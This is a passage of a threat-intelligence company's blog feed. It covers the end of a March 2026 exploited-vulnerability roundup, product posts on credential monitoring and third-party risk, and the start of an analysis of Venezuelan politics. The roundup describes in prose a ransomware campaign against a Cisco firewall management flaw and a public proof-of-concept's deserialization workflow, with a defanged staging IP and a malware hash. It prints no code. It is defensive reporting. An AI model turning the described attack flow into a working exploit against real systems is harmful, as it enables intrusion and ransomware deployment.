        </div>
        <p><em><strong>Table 1:</strong></em> <em>List of vulnerabilities that were actively exploited in March based on Recorded Future data.</em></p>
        <h2>Key Trends: March 2026</h2>
        <ul>
          <li>Most commonly observed weaknesses: CWE-502 (Deserialization of Untrusted Data) and CWE-94 (Code Injection).</li>
          <li>Two vulnerabilities and one exploit kit (consisting of 23 exploits, 12 of which are currently associated with specific CVEs) were linked to malware campaigns.
            <ul>
              <li>Interlock Ransomware Group exploited a zero-day in Cisco Secure Firewall Management Center to compromise enterprise networks, deploy custom remote access trojans (RATs), and facilitate ransomware operations.</li>
              <li>Separately, the DarkSword iOS full-chain exploit enabled Safari-based remote code execution (RCE), sandbox escape, and kernel-level access, leading to deployment of the GHOSTKNIFE, GHOSTSABER, and GHOSTBLADE payloads.</li>
              <li>The Coruna exploit kit similarly compromised iOS devices to deliver the PlasmaLoader (PLASMAGRID) malware.</li>
            </ul>
          </li>
          <li>9 of the 31 vulnerabilities (<a href="https://app.recordedfuture.com/portal/intelligence-card/BDYGD9W/overview">CVE-2026-3910</a>, <a href="https://app.recordedfuture.com/portal/intelligence-card/BGDkG7T/overview">CVE-2026-33017</a>, <a href="https://app.recordedfuture.com/portal/intelligence-card/5GY7RL/overview">CVE-2025-32432</a>, <a href="https://app.recordedfuture.com/portal/intelligence-card/8EgOyF/overview">CVE-2025-54068</a>, <a href="https://app.recordedfuture.com/portal/intelligence-card/BC79ud1/overview">CVE-2026-20963</a>, <a href="https://app.recordedfuture.com/portal/intelligence-card/BBzIRBQ/overview">CVE-2025-68613</a>, <a href="https://app.recordedfuture.com/portal/intelligence-card/3LwTz8/overview">CVE-2025-26399</a>, <a href="https://app.recordedfuture.com/portal/intelligence-card/lEMfcP/overview">CVE-2021-30952</a>, and <a href="https://app.recordedfuture.com/portal/intelligence-card/t5YiER/overview">CVE-2023-41974</a>) allowed attackers to conduct RCE.
            <ul>
              <li>These 9 vulnerabilities affected Google, Langflow, Craft CMS, Laravel, Microsoft, n8n, SolarWinds, and Apple.</li>
            </ul>
          </li>
        </ul>
        <h2>Exploitation Analysis</h2>
        <p>This section analyzes two of the highest-impact, actively exploited vulnerabilities this month. Where applicable, it also highlights the availability of Nuclei templates created by Insikt Group®. The full list of reports and detection rules from March is available to customers in the Recorded Future Intelligence Operations Platform.</p>
        <h3>Interlock Ransomware Group Exploits Cisco FMC Zero-Day (CVE-2026-20131)</h3>
        <p>On March 18, 2026, Amazon Threat Intelligence published an analysis detailing an ongoing <a href="https://app.recordedfuture.com/portal/intelligence-card/zVBC51/overview">Interlock ransomware</a> campaign exploiting <a href="https://app.recordedfuture.com/portal/intelligence-card/BFRKHY5/overview">CVE-2026-20131</a>. CVE-2026-20131 is a critical vulnerability affecting <a href="https://app.recordedfuture.com/portal/intelligence-card/QtqtQ_/overview">Cisco’s Secure Firewall Management Center (FMC)</a> software that allows unauthenticated threat actors to execute arbitrary Java code as root on vulnerable devices. Cisco Secure FMC is a centralized management platform that allows administrators to configure, monitor, and control Cisco firewall devices and network security policies across an enterprise environment. According to Amazon Threat Intelligence, <a href="https://app.recordedfuture.com/portal/intelligence-card/zeRf3k/overview">Interlock Ransomware Group</a> exploited CVE-2026-20131 as a zero-day vulnerability beginning January 26, 2026, indicating active exploitation prior to its public disclosure and enabling early compromise of enterprise networks.</p>
        <p>The Interlock Ransomware Group sends crafted HTTP requests that exploit CVE-2026-20131 on vulnerable Cisco FMC instances to execute arbitrary Java code as root. After gaining access, the threat actors deploy a malicious ELF binary from a staging server at <em>37[.]27[.]244[.]222</em> (<a href="https://app.recordedfuture.com/portal/intelligence-card/ip%3A37.27.244.222/overview">Intelligence Card</a>) to support follow-on operations.</p>
        <p>They then use custom Java- and JavaScript-based RATs, a memory-resident web shell, and proxy infrastructure to maintain access, enable lateral movement, and evade detection. Post-compromise activity includes reconnaissance, data collection and staging, and the use of legitimate tools such as ConnectWise ScreenConnect, Volatility, and Certify for remote access, credential theft, and privilege escalation.</p>
        <p>Insikt Group® obtained a <code>screen locker</code> sample (SHA256: <a href="https://app.recordedfuture.com/portal/intelligence-card/hash%3A6c8efbcef3af80a574cb2aa2224c145bb2e37c2f3d3f091571708288ceb22d5f/overview">6c8efbcef3af80a574cb2aa2224c145bb2e37c2f3d3f091571708288ceb22d5f</a>) shared by Amazon Threat Intelligence from <a href="https://www.recordedfuture.com/ko/products/cyber-operations">Recorded Future Malware Intelligence</a>. Sandbox analysis detected the sample as benign. Based on sandbox and static code analysis, the sample performs the following actions on a victim’s machine:</p>
        <ul>
          <li>Changes the machine’s desktop wallpaper to a pornographic image</li>
          <li>Delays execution using the Sleep API function for evasion</li>
          <li>Detects debuggers using the GetTickCount API function to compare timing</li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_186a5991dfbe0bc8b2faaeac82ea8f42c1a8c4b35.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="769" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>Risk Rules History from Hash Intelligence Card® for 6c8efbcef3af80a574cb2aa2224c145bb2e37c2f3d3f091571708288ceb22d5f in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>Recorded Future customers can find additional exploitation details and MITRE ATT&amp;CK techniques associated with the exploitation of Cisco FMC Zero-Day (CVE-2026-20131) in the Diamond Models section of this <a href="https://app.recordedfuture.com/portal/research/insikt/doc:BGLaVtO/diamond">TTP Instance</a>.</p>
        <h3>Critical Deserialization of Untrusted Data Vulnerability Affecting Cisco Secure FMC Software and Cisco SCC Firewall Management (CVE-2026-20131)</h3>
        <p>On March 11, 2026, GitHub user Sadaf Athar Khan (sak110 on GitHub) shared an <a href="https://github.com/sak110/CVE-2026-20131">alleged proof-of-concept (PoC) exploit</a> for <a href="https://app.recordedfuture.com/portal/intelligence-card/BFRKHY5/overview">CVE-2026-20131</a>. CVE-2026-20131 is a critical Deserialization of Untrusted Data vulnerability affecting <a href="https://app.recordedfuture.com/portal/intelligence-card/QtqtQ_/overview">Cisco Secure Firewall Management Center (FMC)</a> Software and <a href="https://app.recordedfuture.com/portal/intelligence-card/BFMZUkl/overview">Cisco Security Cloud Control (SCC) Firewall Management</a>. Cisco Secure FMC Software is a web-based platform for centrally managing firewall policies, events, and device administration. Cisco SCC Firewall Management is a Software-as-a-Service (SaaS) solution for centralized configuration, monitoring, and maintenance across firewall deployments.</p>
        <p>Exploitation of CVE-2026-20131 allows an unauthenticated remote threat actor to execute arbitrary code and gain root privileges on the affected devices. On March 4, 2026, Cisco published a security advisory and released software updates to fix CVE-2026-20131. The vulnerability resides in the web-based management interface of FMC, where insecure deserialization of a user-supplied Java byte stream allows threat actors to pass serialized objects into Java object handling without sufficient validation. As a result, an unauthenticated remote threat actor can send a crafted serialized Java object to the management interface, trigger arbitrary code execution, and escalate privileges to root.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1d915f77fc51c8a00cb25b9d3961761c63f602a4a.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="778" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong></em> <em><a href="https://www.recordedfuture.com/ko/products/vulnerability-intelligence">Vulnerability Intelligence</a></em> <em>Card® for CVE-2026-20131 in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>Based on Sadaf Athar Khan’s repository, the PoC requires a target URL and a command. Once provided, the PoC generates a malicious Java-serialized object using <code>ysoserial</code>, embedding the supplied command within the payload and preparing it for delivery to the specified target.</p>
        <p>The PoC then attempts to submit the serialized object to a set of candidate endpoints included in the PoC that accept serialized Java data. A reachable deserialization path allows the application to process the object and run the embedded command on the target host. After delivery, the PoC checks the server’s HTTP response codes and treats an HTTP 500 response as an indication that deserialization triggered command execution. The PoC flags HTTP 200 for manual verification because exploitation could succeed without returning visible output.</p>
        <p>Insikt Group® has not tested this PoC for accuracy or efficacy. Recorded Future customers can find MITRE ATT&amp;CK techniques associated with the alleged PoC in the Entities section of this <a href="https://app.recordedfuture.com/portal/research/insikt/doc:BGKXT9d/entities">TTP Instance</a>.</p>
        <h2>Take Action</h2>
        <p>Timely and relevant information on vulnerabilities in your environment and that of your vendors and suppliers is critical for reducing risk. Find out how Recorded Future can support your team by increasing visibility, improving efficiency, and enabling confident decisions.</p>
        <p><strong><a href="https://www.recordedfuture.com/ko/products/vulnerability-intelligence">Vulnerability Intelligence</a></strong> – Prioritize vulnerabilities based on the likelihood of exploitation – not just the severity. Easily understand the risk of exploitation alongside severity, with real-time contextualized intelligence to help you quickly make confident decisions, patch what matters, and prevent attacks.</p>
        <p><strong><a href="https://www.recordedfuture.com/ko/products/attack-surface-intelligence">Attack Surface Intelligence</a></strong> – Identify internet-facing assets vulnerable to a specific CVE. Attack Surface Intelligence provides an outside-in view of your organization to help you actively discover, prioritize, and respond to unknown, vulnerable, or misconfigured assets.</p>
        <p><strong><a href="https://www.recordedfuture.com/ko/products/third-party-intelligence">Third-Party Intelligence</a></strong> – Gain an external view of the security posture of your vendors and partners. Eliminate time-consuming research and vendor communication cycles with the ability to promptly assess vulnerabilities in their internet-facing systems.</p>
        <p><strong><a href="https://www.recordedfuture.com/ko/research/insikt-group">Insikt Group®</a></strong> – Receive access to exclusive reports on new vulnerabilities and trends from Recorded Future’s team of experts, the Insikt Group®. Download Nuclei templates created by Insikt Group® for select CVEs to test potentially vulnerable instances.</p>
        <p><strong><a href="https://www.recordedfuture.com/ko/services/intelligence-services">Recorded Future Professional Services</a></strong> – Work with our Professional Services team on a Vulnerability Analysis Engagement. Designed to equip your team with advanced strategies for identifying, prioritizing, and mitigating threats effectively, this program delves into technologies and operations essential for a successful vulnerability management program. (Learn more about how our Professional Services team can help elevate your team by watching our recent <a href="https://www.brighttalk.com/webcast/20971/650977?utm_source=brighttalk-portal&amp;utm_medium=web&amp;utm_campaign=channel-page&amp;utm_content=cve-monthly-blog">Vulnerability Prioritization Workshop</a>)</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1eb057ac8d9e33292f2d343e2c01e9ea4a86902bd.jpg?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[VIP Credential Monitoring Blog]]></title>
            <link>https://www.recordedfuture.com/ko/blog/vip-credential-monitoring-blog</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/vip-credential-monitoring-blog</guid>
            <pubDate>Fri, 10 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Executives and high-privilege users are prime targets for credential theft — and standard monitoring often misses them. Learn how VIP Credential Monitoring in Recorded Future Identity Intelligence protects your most sensitive accounts across work and personal email, and why detection speed is the difference between a resolved alert and a major incident.]]></description>
            <content:encoded><![CDATA[
        <p>There's a category of employee credentials where standard monitoring often falls short: executives, finance leaders, IT administrators, and those with privileged access have a large target on their back.</p>
        <p>VIP Credential Monitoring in Recorded Future is built to solve this problem. It continuously monitors for credential exposures tied to your most sensitive individuals across both work and personal accounts, and alerts your team fast enough to act before an account takeover occurs.</p>
        <h2>The Challenge with Protecting Your Most Targeted People</h2>
        <p>According to <a href="https://www.verizon.com/business/resources/reports/2025-dbir-executive-summary.pdf">Verizon's 2025 Data Breach Investigations Report</a>, credential abuse was the most prominent initial access vector observed across breaches. Attackers don't need to find a technical vulnerability to get inside your organization. Stolen credentials are widely available across criminal forums and dark web marketplaces, and buying access is often faster and cheaper than building an exploit.</p>
        <p>What makes this particularly calculated is how threat actors decide which credentials to buy. Infostealer malware logs don't just capture usernames and passwords — they capture the authorization URLs where those credentials were entered. According to Recorded Future’s <a href="https://www.recordedfuture.com/ko/blog/identity-trend-report-march-blog">2025 Identity Threat Landscape Report</a>, 7 million credentials were indexed with identifiable authorization URLs, with 63.2% of those having been linked to authentication systems.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1a62ce422e875506eaab3067aac23093b66512971.png?width=750&amp;format=png&amp;optimize=medium" width="932" height="599" />
            </div>
          </div>
          <div>
            <div><strong>Figure 1</strong>: Top authorization URL categories, 2025 (Source: Recorded Future)</div>
          </div>
        </div>
        <p>That means attackers can usually identify the access endpoints that credentials unlock, and they prioritize accordingly. Executives and anyone with broad access to systems and data sit at the top of that list.</p>
        <p>The 2025 cyber attack on the University of Pennsylvania illustrates exactly how this plays out. A threat actor compromised a single employee's SSO credential and used it to move laterally across corporate systems, ultimately exposing data on approximately 1.2 million donors, alumni, and students. One credential, one login, and an organizational crisis.</p>
        <p>The threat doesn't stop at corporate accounts. When attackers can't get hold of an executive's work credentials, they target personal accounts for these high-value targets. A personal email or social account can expose sensitive communications, private information, or material an attacker can use for extortion.</p>
        <p>Corporate security controls don't extend to personal accounts. When those credentials are stolen, most security teams have no line of sight.</p>
        <p>That gap between exposure and discovery is where the risk lives. Credentials stolen by infostealer malware are often purchased and weaponized within 48 hours of the compromise, potentially days or weeks before a security team has any indication something is wrong. For standard employee accounts, that window is serious. For your CEO or Head of Engineering, it's critical.</p>
        <h2>Monitoring Built for High-Value Targets</h2>
        <p>VIP Credential Monitoring provides continuous monitoring and alerting on compromised credentials for your high-value targets. Security teams can add personal or work email addresses for their executives and others with widespread access.</p>
        <p>From that point forward, Recorded Future continuously monitors for those accounts across its full source coverage: infostealer malware logs from 30+ malware families, dark web forums, criminal marketplaces, paste sites, and breach dumps. When a VIP credential surfaces in that data, the team receives an alert with full contextual detail (malware family, authorization URL, compromised host information, etc.) so they can act with confidence.</p>
        <p>Many executive monitoring solutions surface credential data that is days or weeks old by the time it reaches an analyst. By then, the window to get ahead of an attacker has often closed. <a href="https://www.recordedfuture.com/ko/blog/identity-trend-report-march-blog">For all stolen credentials indexed in 2025</a>, Recorded Future detected 36.4% within 24 hours of exfiltration, and 52.9% within one week.</p>
        <p>The gap between when credentials are stolen and when a security team finds out is where breaches happen. Recorded Future closes that gap.</p>
        <p>When a VIP credential appears in exposure data, teams can initiate a password reset, review active sessions, or reach out directly to the individual — all before the credential is exploited. For identities that carry this level of organizational risk, getting ahead of the exposure isn't just operationally valuable; it can be the difference between a resolved alert and a significant incident.</p>
        <h2>A Complete Picture of Identity Exposure</h2>
        <p>VIP Credential Monitoring is built on the same intelligence infrastructure that powers Recorded Future <a href="https://www.recordedfuture.com/ko/products/identity-intelligence">Identity Intelligence</a> broadly: the same source coverage, the same detection engine, the same alert and triage workflow. It applies that capability to a category of identities that warrant closer attention, without requiring a separate tool, process, or integration. That's the logic behind Identity Intelligence as a whole: a unified view of credential exposure across every category of identity your organization needs to protect, covering employees, customers, and your highest-risk individuals.</p>
        <p>For teams already using Identity Intelligence to monitor employee and customer credentials, VIP Monitoring is a targeted extension of coverage that fits into what they've already built. Any VIP credentials identified will benefit from the same core features of Identity Intelligence.</p>
        <p>This includes Incident Reports, which surfaces any other credentials that may have been compromised from the same machine, and Customizable Alerting, which streamlines prioritization of these detections and can trigger response workflows through existing integrations with Okta, Microsoft Entra ID, XSOAR, Splunk, and others.</p>
        <p>Attackers don't limit their targets to one type of account, and your monitoring shouldn't either. To see where you stand today, request a free <a href="https://pages.recordedfutureext.com/IdentityExposureReport_LandingPage.html">Identity Exposure Assessment Report</a> and get a concrete, evidence-based picture of your organization's credential exposure over the past year. Contact us to learn more about how Recorded Future can help your organization protect its identities and to see a demo of the platform in action.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_189c2081486ef4c5b4333dd74730e898e793786a9.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Third-Party Risk Is an Intelligence Operation. It's Time We Treated It Like One.]]></title>
            <link>https://www.recordedfuture.com/ko/blog/recorded-future-sees-its-inclusion-in-the-2026-forrester-wave</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/recorded-future-sees-its-inclusion-in-the-2026-forrester-wave</guid>
            <pubDate>Thu, 09 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Recorded Future sees its inclusion in the 2026 Forrester Wave™ for Cybersecurity Risk Ratings Platforms as a reflection of a broader truth: the era of ratings-only vendor risk management is over.]]></description>
            <content:encoded><![CDATA[
        <p>For years, the cybersecurity industry has treated third-party risk management as a compliance exercise. Assess your vendors. Assign a score. File the report. Move on. That model was built for a different era. One where supply chains were smaller, threat actors were less sophisticated, and a quarterly questionnaire could reasonably approximate a vendor's security posture. That era is over.</p>
        <p>Today, the average enterprise works with hundreds of third parties. Threat actors actively target the weakest links across those supply chains, not because the vendors themselves are the prize, but because they're the path of least resistance into larger, more valuable targets.</p>
        <p>Ransomware groups list vendors on extortion sites before those vendors even know they've been compromised. Stolen employee credentials surface on dark web forums undetected. Critical vulnerabilities are weaponized in hours, not months. In this environment, a security rating is necessary. But it is nowhere near sufficient.</p>
        <h2>Recognized in the 2026 Forrester Wave™</h2>
        <p>Recorded Future was recently included in The Forrester Wave™: Cybersecurity Risk Ratings Platforms, Q2 2026. (The report is available online to <a href="https://www.forrester.com/report/RES192714">Forrester customers or for purchase</a> <a href="https://www.forrester.com/report/RES192714">here</a>).</p>
        <p>We see this recognition as a reflection of the market's evolution — and as an acknowledgement of the direction we've been building toward.</p>
        <p>We believe the cybersecurity risk ratings market is at an inflection point. Analysts and practitioners alike recognize that the category is moving beyond standalone ratings toward integrated intelligence and actionable insights. We see our inclusion in this evaluation as confirmation that the convergence of hygiene data and threat intelligence isn't a niche play — it's where the market is heading. In light of where the ratings market is today, let’s dive into where Recorded Future is going and how Recorded Future envisions the future of securing the third-party ecosystem.</p>
        <h2>The Gap Between Hygiene and Intelligence</h2>
        <p>Cyber risk ratings have earned their place in the security stack. They provide a standardized, scalable way to evaluate a vendor's external security posture — patching cadence, encryption practices, DNS configuration, exposed services. That hygiene baseline matters. It's a correlative signal for breach potential, and it gives risk teams a common language for comparing vendors and benchmarking against industry peers.</p>
        <p>But hygiene ratings only answer part of the problem: <em>How well is this vendor maintaining their defenses?</em></p>
        <p>They don't tell you whether anyone is actively trying to breach those defenses. They don't surface the dark web chatter on a specific vendor. They don't alert you when a vendor's credentials are leaked or when the vendor has an active malware infection. This is the gap that has left third-party risk programs perpetually reactive. Teams learn about vendor compromises from news headlines or from the vendors themselves — often days or weeks after the initial breach. By then, the window for proactive response may have closed.</p>
        <p>From our own customer conversations, we hear that security and risk teams have shifted from wanting ratings and accuracy alone to demanding intelligence that reveals real cybersecurity risk, with prioritized findings and actionable remediation guidance. Ratings are increasingly commoditized. The differentiation now lies in what you do with the data, and what additional signals you bring to the table.</p>
        <h2>Third-Party Risk Management Is an Intelligence Operation</h2>
        <p>If you accept that ratings alone aren't enough, the logical next step is clear: third-party risk management must be treated as an intelligence operation.</p>
        <p>That means combining the hygiene baseline — the outside-in view of a vendor's security posture — with real-time threat intelligence that tells you who is being targeted, how, and what you should do about it. It means shifting from periodic assessments to continuous monitoring. It means equipping risk teams with the context to distinguish between a low-priority configuration issue and a vendor whose infrastructure is actively under attack. This is the problem <a href="https://www.recordedfuture.com/ko/products/third-party-intelligence">Recorded Future Third-Party Risk</a> was built to solve.</p>
        <p>We've brought together two distinct capabilities that, until now, existed in separate worlds.</p>
        <ol>
          <li><a href="https://www.riskrecon.com/">RiskRecon</a> — built over a decade as one of the industry's leading cyber risk ratings platforms, trusted by 21,500+ users across 30+ industries, provides the hygiene foundation: transparent, evidence-backed security ratings evaluated across 40+ criteria in 9 security domains, with 99% audited data accuracy.</li>
          <li><a href="https://www.recordedfuture.com/ko/platform">Recorded Future's threat intelligence capabilities</a>, powered by collection and analysis across more than 1 million sources, adds the threat dimension: real-time alerting on ransomware extortion activity, dark web exposures, credential leaks, and active vulnerability exploitation — often before the affected vendor is even aware.</li>
        </ol>
        <p>Together, these capabilities create something the market hasn't had before: <strong>a single solution that covers the full lifecycle of third-party risk, from initial assessment and onboarding through continuous monitoring and incident response</strong>.</p>
        <h2>What This Looks Like in Practice</h2>
        <p>The value of combining hygiene ratings with threat intelligence isn't theoretical. Our customers are already seeing it play out.</p>
        <ul>
          <li>When a vendor appears on a ransomware extortion site, Third-Party Risk customers can receive alerts in hours — not the days or weeks it takes for vendor self-disclosure.</li>
          <li>When credentials associated with a monitored vendor surface on dark web markets, risk teams can initiate outreach and remediation before those credentials are weaponized.</li>
          <li>When a critical vulnerability is disclosed, intelligence context helps analysts determine which vendors are actually exposed and at risk of exploitation, rather than treating every vendor with the affected software as equally urgent.</li>
        </ul>
        <p>Customers consistently report a roughly 33% increase in visibility into third-party risks after adopting the platform (<a href="https://app.userevidence.com/assets/5382HRMQ">UserEvidence</a>). Teams save an average of 7 hours per week that was previously spent on manual research and monitoring (<a href="https://app.userevidence.com/assets/6884WZGT">UserEvidence</a>). And customers routinely detect vendor incidents before the vendor itself has disclosed — turning what used to be a reactive scramble into a controlled, proactive response.</p>
        <p>These aren't incremental improvements. They represent a fundamental shift from reactive compliance to proactive risk management.</p>
        <h2>Where We're Going</h2>
        <p>We're not done. Bringing RiskRecon and Recorded Future together was the first step in a broader vision for what third-party risk management should become.</p>
        <p>Our roadmap is focused on deepening the integration between these two platforms into a unified experience. One where hygiene ratings, threat intelligence, and risk workflows operate seamlessly together. We're investing in AI-driven capabilities that will help risk analysts cut through noise faster, automate routine assessment workflows, and surface the insights that matter most. And we're building toward predictive intelligence that doesn't just tell you what's happening now, but helps you anticipate where risk is headed.</p>
        <p>The goal is straightforward: make third-party risk management as data-driven, automated, and intelligence-led as the best security operations programs already are.</p>
        <h2>Join the Shift to Intelligence-Driven Third-Party Risk</h2>
        <p>Third-party risk programs that rely exclusively on hygiene ratings will continue to be caught off guard. The vendors who score well on a Tuesday can be breached by Wednesday. The questionnaire response you received last quarter may not reflect today's reality.</p>
        <p>The organizations that are getting ahead of this are the ones treating third-party risk as what it actually is: an intelligence operation that requires continuous monitoring, real-time alerting, and the context to act decisively when something changes.</p>
        <p>That's the future we're building. And we believe we're the only ones building it with the depth of intelligence and the strength of ratings data required to get it right.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_100e70f38b09c3ffd0d78368f1b1fb6b9fab24f95.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Understanding and Anticipating Venezuelan Government Actions]]></title>
            <link>https://www.recordedfuture.com/ko/research/understanding-and-anticipating-venezuelan-government-actions</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/understanding-and-anticipating-venezuelan-government-actions</guid>
            <pubDate>Wed, 08 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Explore an in-depth analysis of Venezuela’s political landscape following the January 2026 US operation to capture Nicolás Maduro. This executive summary examines Acting President Delcy Rodríguez’s transition strategy, her pragmatic re-engagement with Washington, and the internal threats posed by PSUV rivals like Diosdado Cabello. Gain insights into the "three-phase" US plan for stabilization, the 2026 Organic Hydrocarbons Law reforms, and the outlook for economic recovery versus the existential threat of competitive elections. Essential intelligence for organizations monitoring Latin American geopolitical risk and energy sector investments.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Venezuelan Acting President Delcy Rodríguez’s policy decisions will affect economic and political stability in Venezuela in the coming months. Her approach will likely be shaped by a deep familiarity with the state security apparatus, her revolutionary identity, a demonstrated willingness to break from orthodoxy and seek coordination with Washington, an interest in restoring support for the ruling United Socialist Party of Venezuela (PSUV), and a long memory for perceived slights. These principles, paired with changing local power dynamics after the January 3, 2026, United States (US) special operation to capture former Venezuelan President Nicolás Maduro and his wife, Cilia Flores, suggest Rodríguez is very likely to prioritize near-term governability and economic stabilization over maximalist ideological positioning. At the same time, she will likely find ways to cooperate with the US in ways designed to preserve the rule of PSUV and her credibility with other members of the ruling coalition. Rodríguez’s core objectives are very likely to preserve PSUV rule and resist an opposition-led transfer of power, while maximizing the economic benefits of reengagement with Washington, including sanctions relief, investment, and a possible economic recovery. This will likely contribute to Rodríguez governing in a manner that avoids high-risk moves that could fracture her coalition or trigger instability that undermines her utility to the White House. In this approach, the biggest internal threat she faces in the short term is very likely PSUV rivals, including Interior Minister Diosdado Cabello, and other military and economic elites who perceive US engagement as a direct threat to their interests. While it is impossible to predict every move the Venezuelan government may take, public and private organizations can better anticipate risks to stability and investments — such as resistance to US-supported reforms or evidence of internal divisions in the regime — by systematically monitoring the rhetoric and actions of Delcy Rodríguez, Diosdado Cabello, and other senior officials using the Recorded Future® Intelligence Operations Platform.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>The January 3, 2026, US operation provoked panic among Venezuelan elites and fueled deep uncertainty regarding the plan to succeed Maduro, which was only resolved when US signaling prompted Venezuelan institutions to confirm that Rodríguez would assume presidential duties.</li>
          <li>Rodríguez’s hold on power is threatened internally by rival PSUV figures, chief among them Interior Minister Diosdado Cabello and his network of allies across Venezuela’s security apparatus and among pro-government armed groups.</li>
          <li>Externally, the main threats to Rodríguez’s power stem from US leverage over Caracas, including US geopolitical aims to bring Venezuela further under Washington’s influence as well as US officials’ stated pursuit of a transition and support for the opposition faction led by María Corina Machado.</li>
          <li>To avoid a destabilizing rupture that could trigger US backlash, Delcy Rodríguez will very likely prioritize internal governability and economic stabilization, cooperating with Washington enough to see sustained sanctions relief while seeking to manage rather than expel hardline rivals from her coalition.</li>
          <li>To preserve her own credibility and influence in Venezuela, Rodríguez is likely to pair compliance with Washington’s demands with “face-saving” gestures that assert Venezuelan sovereignty, and to resist genuinely competitive elections unless economic gains materially improve the PSUV’s electoral odds.</li>
        </ul>
        <h2>Assessing Current Dynamics in Venezuela</h2>
        <p>Over the past 25 years, US-Venezuela relations have worsened as Venezuela’s government actively sought to oppose US interests in the Western Hemisphere, deepened relations with US rivals around the globe, and became increasingly authoritarian. This began under the deceased former president Hugo Chávez, whose movement, known as “Chavismo,” has governed the country since 1999. After Nicolás Maduro took power in Venezuela following Chávez’s death in 2013, he accelerated the consolidation of power and the erosion of democratic institutions begun by his predecessor. The US <a href="https://www.atlanticcouncil.org/commentary/trackers-and-data-visualizations/who-is-the-international-community-sanctioning-in-venezuela/">responded</a> by imposing financial and oil sanctions meant to limit Venezuela’s ability to profit from its vast oil reserves and sanctioning over 200 members of the Venezuelan elite. The US pressure campaign on Venezuela accelerated in late 2025 under President Donald Trump, who deployed a historic number of naval assets to the Caribbean.</p>
        <p>This military campaign culminated at around 02:00 Venezuelan Standard Time (VET) on January 3, 2026, when US special forces carried out airstrikes and a surgical intervention into Venezuela as part of an operation to capture and extract Maduro and his wife, Cilia Flores, to face drug trafficking and terrorism charges in New York. These events were the most significant US military operation in Latin America since the 1989 invasion of Panama, and ratified a new US doctrine that emphasizes primacy and willingness to use all available tools (economic, diplomatic, and military) to advance US interests in the Western Hemisphere, as <a href="https://www.whitehouse.gov/wp-content/uploads/2025/12/2025-National-Security-Strategy.pdf">laid</a> out in the 2025 National Security Strategy. In Venezuela, the events of January 3 precipitated the most impactful shakeup of the country’s political order in decades.</p>
        <p>While Acting President Delcy Rodríguez has <a href="https://cnnespanol.cnn.com/2026/02/26/venezuela/video/delcy-rodriguez-amigo-socio-donald-trump-sanciones">signaled</a> an openness to working with US priorities, this cooperation is affected by active tensions among the ruling elite and longstanding mistrust between Washington and Caracas. Understanding the events of January 3, 2026, and the immediate aftermath is crucial to evaluating the state of play on the ground and in the bilateral relationship.</p>
        <h2>Uncertainty in the Immediate Aftermath of the US Operation</h2>
        <p>In the immediate aftermath of the January 3 operation, there was widespread uncertainty in Venezuela regarding the future of PSUV rule. While the constitutional line of succession makes clear that the vice president should assume power in the president’s absence, initial messages from Venezuelan officials emphasized solidarity with Maduro and Flores rather than offering clarity on the future of PSUV governance. There was no official public reaction to the operation from the Venezuelan government until 04:14 VET, when former Defense Minister Vladimir Padrino López published a video on social media condemning the attack. He stated that Venezuela’s military — the Bolivarian Armed Forces (FANB) — was declaring a national emergency and deploying at strategic points around the country and <a href="https://www.facebook.com/PadrinoVladimir/videos/pueblo-heroico-de-venezuela-soldados-de-la-patria-hijos-e-hijas-de-bol%C3%ADvar-la-fu/692139637164231/">called</a> for unity against “imperialist threats.” Statements from Venezuelan officials since then confirmed the raid but did not clarify the makeup of the Venezuelan government.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1efba2db35f8d6829c5783b4a88eb7415755e9a6a.png?width=750&amp;format=png&amp;optimize=medium" width="686" height="386" />
            </div>
          </div>
          <div>
            <div>
              <p><em><strong>Figure 1:</strong></em> <em>Venezuelan state TV broadcast showing Rodríguez presiding over a meeting of the Council of National Defense (Source:</em> <em><a href="https://www.youtube.com/watch?v=Z3E0uWN88Gk">Telesur</a>)</em></p>
            </div>
          </div>
        </div>
